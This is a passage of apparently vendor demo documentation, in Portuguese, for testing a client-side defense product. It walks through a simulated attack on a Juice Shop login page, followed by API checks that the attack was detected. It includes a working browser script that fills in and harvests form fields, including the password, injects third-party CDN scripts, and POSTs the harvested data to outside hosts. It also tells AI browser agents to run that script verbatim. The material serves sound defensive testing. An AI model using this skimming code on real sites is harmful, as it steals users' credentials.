Fase 2 — Ataque

A Fase 2 gera tráfego de ataque simulado contra a aplicação protegida e confirma que o CSD o detectou. A Fase 1 deve estar completa — todas as verificações da Etapa 7 com status APROVADO — antes de prosseguir.

Etapa 8: Simulação de Ataque

Nota

Esta etapa requer execução de JavaScript no lado do navegador — curl não pode acionar a detecção do CSD. Assistentes de IA com ferramentas de automação de navegador (MCP Chrome DevTools, Playwright, Puppeteer) executam estas etapas diretamente usando a sequência de Execução Automatizada por IA abaixo. Operadores sem automação de navegador realizam as etapas manuais.

Após a infraestrutura ser verificada (todas as verificações da Etapa 7 da Fase 1 com status APROVADO), execute os scripts de simulação de ataque para gerar detecções do CSD. Os scripts estão definidos no guia Acionar Detecção e na Biblioteca de Scripts de Ataque.

Execução Automatizada por IA

Assistentes de IA com ferramentas de automação de navegador executam a simulação de ataque de forma programática:

1. Navegar com initScript — primeiro navegue para about:blank para garantir um contexto de documento limpo (evita initScripts obsoletos de navegações anteriores), depois navigate_page para http://$F5XC_DOMAINNAME/#/login com um initScript que salva as referências nativas de setInterval, clearInterval, fetch e console.log antes que o zone.js as substitua, aguarda os campos do formulário de login, preenche as credenciais via o setter nativo HTMLInputElement.prototype.value e executa o Script de Detecção Combinado inline imediatamente. Use o initScript exato abaixo.
2. Dispensar Banner de Boas-vindas — press_key com Escape para fechar o Banner de Boas-vindas. Em visitas subsequentes, o banner pode não aparecer (cookies persistidos). O diálogo de consentimento de cookies é dispensado automaticamente pela tecla Escape.
3. Aguardar a conclusão — aguarde 10 segundos para que todos os callbacks de carregamento/erro de scripts do CDN e resoluções de promessas fetch sejam concluídos.
4. Capturar evidências — list_console_messages para verificar [CSD Demo] Simulation complete e resultados de carregamento do CDN; list_network_requests filtrado por tipos script e fetch para verificar códigos de status HTTP (200/201 para sucesso, pending para requisições retidas).

initScript da Fase 2 (literal — use exatamente como está escrito):

// Save native references before zone.js patches them
var _si = window.setInterval.bind(window);
var _ci = window.clearInterval.bind(window);
var _fetch = window.fetch.bind(window);
var _log = window.console.log.bind(window.console);

// Poll for login form fields, fill credentials, run detection script
var _poll = _si(function() {
  var emailEl = document.querySelector('#email');
  var passEl  = document.querySelector('#password');
  if (emailEl && passEl) {
    _ci(_poll);
    // Fill credentials via native setter (bypasses zone.js)
    var nativeSet = Object.getOwnPropertyDescriptor(
      window.HTMLInputElement.prototype, 'value').set;
    nativeSet.call(emailEl, 'test@example.com');
    emailEl.dispatchEvent(new Event('input', { bubbles: true }));
    nativeSet.call(passEl, 'P@ssword123');
    passEl.dispatchEvent(new Event('input', { bubbles: true }));

    // Run Combined Detection Script inline using native fetch for exfil
    (function() {
      _log('==================================================');
      _log('[CSD Demo] Combined Detection Script — Starting');
      _log('==================================================');

      _log('\n[Formjack] Phase 1: Form field harvesting');
      var inputs = document.querySelectorAll('input');
      var harvested = {};
      inputs.forEach(function(input) {
        var name = input.name || input.id || input.type;
        harvested[name] = input.value || '(empty)';
      });
      _log('[Formjack] Harvested ' + Object.keys(harvested).length + ' fields:', harvested);

      _log('\n[Supply Chain] Phase 2: Multi-CDN script injection');
      var cdns = [
        { url: 'https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js', name: 'jsdelivr' },
        { url: 'https://esm.sh/moment@2.30.1', name: 'esm.sh' },
        { url: 'https://unpkg.com/underscore@1.13.7/underscore-min.js', name: 'unpkg' },
        { url: 'https://ga.jspm.io/npm:dayjs@1.11.13/dayjs.min.js', name: 'jspm' }
      ];
      cdns.forEach(function(cdn) {
        var script = document.createElement('script');
        script.src = cdn.url;
        script.onload = function() { _log('[Supply Chain] Loaded from ' + cdn.name + ': ' + cdn.url); };
        script.onerror = function() { _log('[Supply Chain] Blocked/failed from ' + cdn.name + ': ' + cdn.url); };
        document.head.appendChild(script);
        _log('[Supply Chain] Injected script tag: ' + cdn.name);
      });

      _log('\n[Exfil] Phase 3: Data exfiltration');
      var payload = JSON.stringify({
        type: 'combined_demo', credentials: harvested,
        page: window.location.href, timestamp: Date.now()
      });
      _fetch('https://www.httpbin.org/post', { method: 'POST', mode: 'no-cors', body: payload })
        .then(function() { _log('[Exfil] Data sent to www.httpbin.org'); });
      _fetch('https://jsonplaceholder.typicode.com/posts', {
        method: 'POST', mode: 'no-cors',
        headers: { 'Content-Type': 'application/json' }, body: payload
      }).then(function() { _log('[Exfil] Data sent to jsonplaceholder.typicode.com'); });

      _log('\n==================================================');
      _log('[CSD Demo] Simulation complete');
      _log('[CSD Demo] Fields harvested: ' + Object.keys(harvested).length);
      _log('[CSD Demo] Scripts injected: 4 (4 CDN domains)');
      _log('[CSD Demo] Exfil channels: 2 (fetch POST)');
      _log('==================================================');
    })();
  }
}, 300);

Cuidado

Incompatibilidade com zone.js — O Juice Shop usa o zone.js do Angular, que substitui setTimeout, setInterval, fetch, XMLHttpRequest e outras APIs do navegador. Isso quebra as ferramentas evaluate_script, fill e click do MCP com Cannot read properties of undefined (reading 'call'). Use navigate_page com initScript em vez disso — o initScript é executado antes do carregamento do zone.js, então você pode salvar referências nativas de API e utilizá-las em callbacks de polling. O initScript deve preencher campos do formulário usando o setter nativo HTMLInputElement.prototype.value (não fill) e executar o script de detecção inline (não via setTimeout, que o zone.js pode interceptar após o carregamento da página). Consulte Acionar Detecção — Execução Automatizada por IA para mais detalhes.

Nota

Acúmulo de initScript — cada chamada navigate_page com um parâmetro initScript adiciona o script a uma lista persistente que é executada em cada carregamento de documento subsequente. Para evitar que scripts obsoletos interfiram, navegue para about:blank entre execuções ou use new_page com isolatedContext para um contexto de navegador limpo.

Nota

Salvando fetch nativo no initScript — o initScript salva window.fetch.bind(window) antes que o zone.js o substitua. Isso garante que as chamadas fetch funcionem corretamente sem os erros Cannot read properties of undefined do zone.js. O mesmo initScript (com fetch nativo salvo) é usado tanto para as execuções de ataque da Fase 2 quanto da Fase 3 — a mitigação do CSD não intercepta chamadas fetch(), portanto salvar a referência nativa não afeta o comportamento de mitigação.

Cuidado

Erro 404 transitório de origem — na primeira navegação para a aplicação Angular, polyfills.js ou outros scripts da aplicação podem retornar um HTTP 404 transitório do servidor de origem. Isso faz com que o Angular falhe ao inicializar, resultando em uma página em branco sem formulário de login. O erro 404 é efêmero — requisições subsequentes retornam 200 ou 304. Recuperação: navegue para about:blank, aguarde 2 segundos e tente a navegação novamente. Se o problema persistir após múltiplas tentativas, verifique a integridade da origem via o caminho do balanceador de carga (curl -s -o /dev/null -w '%{http_code}' http://$F5XC_DOMAINNAME/polyfills.js).

Execução Manual

Operadores sem ferramentas de automação de navegador realizam as etapas manualmente:

1. Navegar para a página de login da aplicação protegida: http://xF5XC_DOMAINNAMEx/#/login
2. Inserir credenciais fictícias — digite test@example.com no campo Email e P@ssword123 no campo Senha (não envie o formulário)
3. Abrir DevTools — pressione F12 e mude para a aba Console
4. Executar o Script de Detecção Combinado — cole o script de Acionar Detecção — Executar o Script de Simulação Combinado no console e pressione Enter
5. Verificar a saída do console — confirme que a saída em fases [CSD Demo] exibe: coleta de campos do formulário, injeção de script a partir de 4 domínios CDN e exfiltração de dados para 2 endpoints

O Que É Acionado

Sinal	Comportamento	Detecção
Coleta de campos do formulário	Lê os valores dos campos de email e senha	Scripts lendo campos de formulário sensíveis — sinalizados como Alto Risco
Injeção de script	Injeta 4 tags <script> de cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io	Até 4 novos domínios de script de terceiros detectados (disponibilidade do CDN pode variar)
Exfiltração de dados	Envia dados coletados via fetch para www.httpbin.org e jsonplaceholder.typicode.com	Chamadas de rede para domínios externos

Nota

A disponibilidade do CDN varia. Nem todos os 4 scripts CDN serão carregados em toda execução — limites de recursos do navegador, condições de rede ou limitação de CDN podem fazer com que alguns falhem com ERR_INSUFFICIENT_RESOURCES ou timeout. A simulação tem sucesso se qualquer script CDN for carregado. O CSD detecta a tentativa de injeção independentemente de o script ser carregado com sucesso — a própria criação da tag <script> é o sinal de detecção.

Em casos graves, ERR_INSUFFICIENT_RESOURCES pode escalar para uma falha no nível da página — a página inteira fica em branco, screenshots expiram por timeout e take_snapshot falha. Isso normalmente ocorre após múltiplas navegações com initScripts pesados acumulados no mesmo contexto de navegador. Recuperação: use new_page com isolatedContext para criar um contexto de navegador limpo e tente novamente a partir da sequência about:blank → navigate_page com initScript. Isso é diferente de falhas individuais em scripts CDN, que não afetam o sucesso da simulação.

Dica

Após executar a simulação de ataque, use este loop de polling determinístico para aguardar as detecções:

1. Consulte /detected_domains a cada 60 segundos
2. Se DET-3 for aprovado (domínios de exfiltração aparecem em /detected_domains), prossiga para a Etapa 9 imediatamente
3. Se ainda estiver vazio após 10 consultas (10 minutos), verifique o status do CSD (Etapa 5 da Fase 1) e o registro do domínio protegido (Etapa 6 da Fase 1) — provavelmente um destes está mal configurado
4. Se ainda estiver vazio após 30 consultas (30 minutos), interrompa e reporte ao operador — não continue para a Fase 3

Para simulações adicionais direcionadas (categorias individuais de ataque, teste de estresse de detecção máxima), consulte a Biblioteca de Scripts de Ataque.

Evidências

O assistente de IA deve relatar o seguinte. Para execução automatizada por IA, as evidências são capturadas de forma programática via list_console_messages (a função de polling do initScript registra os resultados no console). Para execução manual, o operador lê a saída do console do navegador.

Verificação	Esperado	Status
Página de login carregada	200 OK em http://$F5XC_DOMAINNAME/#/login	APROVADO / REPROVADO
Script do console executado	[CSD Demo] Simulation complete na saída do console	APROVADO / REPROVADO
Campos coletados	Contagem > 0 na saída do console	APROVADO
Scripts injetados	1–4 domínios CDN na saída do console (alguns podem falhar com erros de recursos)	APROVADO se qualquer domínio CDN aparecer
Canais de exfiltração	2 tentativas de fetch POST na saída do console	APROVADO

Dica

Se o certificado do LB HTTPS for válido (CertificateValid), você pode opcionalmente executar a simulação também em https://$F5XC_DOMAINNAME/#/login. Isso não é obrigatório para a progressão da demonstração.

Etapa 9: Verificação de Detecção via API

Consulte os endpoints da API do CSD para confirmar que as detecções apareceram. Use o loop de polling: consulte /detected_domains a cada 60 segundos; prossiga assim que DET-3 for aprovado. Se DET-3 não for aprovado após 10 minutos, verifique a configuração do CSD. Se DET-3 não for aprovado após 30 minutos, interrompa e reporte ao operador. Esses endpoints estão documentados na Referência da API e usam a mesma autenticação e namespace das etapas anteriores.

Nota

Ordem de processamento dos endpoints: /detected_domains é populado primeiro e é o indicador principal de que o pipeline do CSD está funcionando. /scripts e /formFields são populados em um cronograma de processamento de backend mais lento e podem permanecer vazios por 20–30 minutos mesmo após múltiplas execuções de simulação. Se /detected_domains mostrar domínios de exfiltração (www.httpbin.org, jsonplaceholder.typicode.com), considere a simulação como detectada com sucesso e prossiga — a verificação DET-1 abaixo reflete isso.

Scripts Detectados

Consulte os scripts detectados nas últimas 24 horas:

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s -X POST \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  -H "Content-Type: application/json" \
  -d "{\"startTime\": \"$START\", \"endTime\": \"$NOW\"}" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/scripts" \
  | jq '{total: (.scripts | length), scripts: [.scripts[]? | {script_name: .script_name, risk_level: .risk_level}]}'

Campo	Esperado	Status
total	> 0 (scripts detectados)	APROVADO se > 0; PENDENTE se 0, mas /detected_domains mostrar domínios de exfiltração
Nomes de scripts	Inclui domínios CDN (cdn.jsdelivr.net, esm.sh, unpkg.com, ga.jspm.io) em script_name	APROVADO se domínios CDN injetados aparecerem

Domínios Detectados

curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/detected_domains" \
  | jq '{total_domains: .domain_summary.totalDomains, domains: [.domains_list[]? | {domain: .domain, category: .category}]}'

Campo	Esperado	Status
total_domains	> 0	APROVADO se > 0
Lista de domínios	Inclui domínios CDN e de exfiltração	APROVADO se os domínios esperados aparecerem

Campos de Formulário

NOW=$(date +%s)
START=$(( NOW - 86400 ))
curl -s \
  -H "Authorization: APIToken xF5XC_API_TOKENx" \
  "xF5XC_API_URLx/api/shape/csd/namespaces/xF5XC_NAMESPACEx/formFields?startTime=$START&endTime=$NOW" \
  | jq '{total: .total_size, fields: [.form_fields[]? | {name: .name, sensitivity: .analysis.value, scripts: (.associated_scripts | length), locations: .locations}]}'

Campo	Esperado	Status
total	> 0	APROVADO se > 0; PENDENTE se 0, mas DET-3 for aprovado
name	Inclui email, password	APROVADO se campos sensíveis aparecerem
sensitivity	Sensitive para campos de email/senha	APROVADO se o ML classificar corretamente

Nota

O processamento de campos de formulário é mais lento que a detecção de domínios. O endpoint /formFields pode retornar campos com metadados parciais na primeira consulta. A classificação de sensibilidade por ML (Sensitive vs Not Sensitive) é populada após a conclusão do processamento do backend — isso pode levar 20–30 minutos após a primeira execução da simulação. Se os campos aparecerem sem classificação, consulte novamente mais tarde. DET-3 (/detected_domains) é o critério principal de aprovação.

Resumo de Evidências da Fase 2

Após todas as consultas de detecção, apresente o status final de detecção:

ID do Teste	Verificação	Status
DET-1	Scripts detectados (endpoint /scripts)	APROVADO se > 0; PENDENTE se vazio, mas DET-3 for aprovado
DET-2	Domínios CDN detectados	APROVADO / REPROVADO
DET-3	Domínios de exfiltração detectados (/detected_domains)	Indicador principal — APROVADO se www.httpbin.org ou jsonplaceholder.typicode.com aparecerem
DET-4	Campos de formulário detectados (endpoint /formFields)	APROVADO se > 0; PENDENTE se vazio, mas DET-3 for aprovado

Nota

Critério mínimo de aprovação para prosseguir para a Fase 3: DET-3 deve ser APROVADO (domínios de exfiltração visíveis em /detected_domains). DET-1 e DET-4 podem mostrar PENDENTE no primeiro uso ou após uma reconstrução recente — isso é normal. Se DET-3 também mostrar REPROVADO após 30 minutos, verifique se o CSD está habilitado (Etapa 5 da Fase 1), se o domínio protegido está registrado (Etapa 6 da Fase 1) e se a tag JS do CSD está sendo injetada (verificação de Configuração JS da Etapa 7 da Fase 1).

---

Fase 2 concluída. Prossiga para Fase 3 — Mitigar para aplicar regras de mitigação e verificar se os domínios estão bloqueados.